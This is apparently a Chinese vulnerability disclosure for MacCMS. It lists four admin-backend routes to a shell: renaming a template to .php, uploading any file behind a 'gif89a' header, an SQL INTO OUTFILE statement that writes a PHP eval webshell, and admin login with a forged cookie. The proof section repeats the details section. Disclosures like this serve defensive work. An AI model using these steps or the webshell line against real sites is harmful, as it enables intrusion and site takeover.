### 简要描述:
苹果CMS全版本后台getshell打包
苹果cms官网http://www.maccms.com/
### 详细说明:
漏洞一后台模板任意后缀文件
[<img src="https://images.seebug.org/upload/201402/2809474390f6d06521ddd092ec7c755cfc8375f2.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/2809474390f6d06521ddd092ec7c755cfc8375f2.jpg)
chrome审查元素吧value里的.html改成.php
[<img src="https://images.seebug.org/upload/201402/2809495593fdda8bc9ec1ca52d7c78994b0309f6.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/2809495593fdda8bc9ec1ca52d7c78994b0309f6.jpg)
拿到shell
漏洞2后台任意上传文件
[<img src="https://images.seebug.org/upload/201402/28095118e5be2bb668fad85006e7fd03338b5828.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095118e5be2bb668fad85006e7fd03338b5828.jpg)
视频管理里文件头部添加gif89a任意上传后缀文件
[<img src="https://images.seebug.org/upload/201402/28095230c3afd6a47a0b928e8aaaa37c5b9c209a.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095230c3afd6a47a0b928e8aaaa37c5b9c209a.jpg)
漏洞3包路径+执行数据库拿shell
[<img src="https://images.seebug.org/upload/201402/28095350d3c825dd9ee3d71ce5776a72680c3211.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095350d3c825dd9ee3d71ce5776a72680c3211.jpg)
获得路径+mysql
执行
```
select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:\PHPnow-1.5.6\htdocs\mac\wooyun.php'
```
[<img src="https://images.seebug.org/upload/201402/28095621e3dec31127a6614221467e9481b69a9b.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095621e3dec31127a6614221467e9481b69a9b.jpg)
拿到shell
漏洞4任意cookie登入后台
只要知道后台账号本地搭建环境用cookie浏览器获取cookie然后到目标网站登入修改cookie直接进入后台
### 漏洞证明:
漏洞一后台模板任意后缀文件
[<img src="https://images.seebug.org/upload/201402/2809474390f6d06521ddd092ec7c755cfc8375f2.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/2809474390f6d06521ddd092ec7c755cfc8375f2.jpg)
chrome审查元素吧value里的.html改成.php
[<img src="https://images.seebug.org/upload/201402/2809495593fdda8bc9ec1ca52d7c78994b0309f6.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/2809495593fdda8bc9ec1ca52d7c78994b0309f6.jpg)
拿到shell
漏洞2后台任意上传文件
[<img src="https://images.seebug.org/upload/201402/28095118e5be2bb668fad85006e7fd03338b5828.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095118e5be2bb668fad85006e7fd03338b5828.jpg)
视频管理里文件头部添加gif89a任意上传后缀文件
[<img src="https://images.seebug.org/upload/201402/28095230c3afd6a47a0b928e8aaaa37c5b9c209a.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095230c3afd6a47a0b928e8aaaa37c5b9c209a.jpg)
漏洞3包路径+执行数据库拿shell
[<img src="https://images.seebug.org/upload/201402/28095350d3c825dd9ee3d71ce5776a72680c3211.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095350d3c825dd9ee3d71ce5776a72680c3211.jpg)
获得路径+mysql
执行
```
select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:\PHPnow-1.5.6\htdocs\mac\wooyun.php'
```
[<img src="https://images.seebug.org/upload/201402/28095621e3dec31127a6614221467e9481b69a9b.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/28095621e3dec31127a6614221467e9481b69a9b.jpg)
拿到shell
漏洞4任意cookie登入后台
只要知道后台账号本地搭建环境用cookie浏览器获取cookie然后到目标网站登入修改cookie直接进入后台
暂无评论